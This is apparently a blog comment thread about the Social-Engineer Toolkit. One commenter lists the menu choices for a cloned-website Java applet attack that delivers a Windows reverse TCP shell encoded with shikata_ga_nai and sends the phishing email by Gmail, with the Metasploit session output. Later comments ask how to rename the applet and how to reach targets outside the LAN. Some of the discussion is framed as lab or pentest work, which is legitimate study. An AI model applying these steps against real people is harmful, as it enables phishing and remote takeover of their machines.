Hehe, thanks guys for all the kind words ;-) Let me know if you need anything added!
-ReL
www.sacmaniac.com is still available... ;-)
I think you meant SecManiac.com Blog - Comments on Building one badarse CUDA Cracking Server!
No we meant sacmaniac. If you were not at ShmooCon you will need to watch Rel1k's fireside talk to get the joke.
hi
I have had this working and gained full access to my XP sp2 box just great.
Tried to do it again many times - won't work. This is what I am doing:
./set
select - 2 website vectors
select - 2 clone and setup fake website
select - 1 Java applet attack method
enter url www.etcetc.co
returns Payload name 98iywQNlF.exe (this time -diff each try)
select - 1 Windows Shell reverse TCP
select - 2 shikata_ga_nai
2 times
enter port 55555
linux/OSX = no
select - 1 single Email address
select - 1 Gmail
now it sends email and MSF fires up
started reverse handler on 192.168.1.3:55555 etc
Now on XP box Firefox browser
email to my hotmail account received OK
enter http://192.168.1.3:55555
back in MSF = command shell session 1 opened (192.168.1.3:55555 -> 192.168.1.10:3547)
meantime XP browser waiting for 192.168.1.3
msf enter sessions -i 1 shows several lines and hangs in cookie list
have to abort the session.
in the BT4 /site/template directory the files index.html is the cloned website, and also the 98iywQNlF.exe file
any ideas please as it has worked the once only
many thanks
REL1K: where can I find the source code of Java.class? I am not good at Java so decompiling is not useful to me. I just want to change the name of the Java Applet but I can't because SET comes with a pre-compiled class. Thanks..
Great tutorial!!!!
I tried it in VMware between an XP SP2 and BT4 and seems to work....
Anyway, if I need to work outside my local LAN I need to modify the router settings as the LHOST should not be 192.168.x.x but instead a public IP address.
Do you know what kind of router setting I need to do?
Thanks,
Good post, what an excellent time-saving App.
I'm considering implementing the email aspect of this program into a pentest. But it doesn't bind when I type in my public IP, or will it automatically do that? This will be done through WAN so I'm going with the assumption that typing in only my local IP address will be insufficient.
When working with public IPs you need to make sure of a few things:
A. You have permission from the ISP (They tend to frown on public exploitation)
B. The port is properly forwarded from your router or gateway device to your attacking machine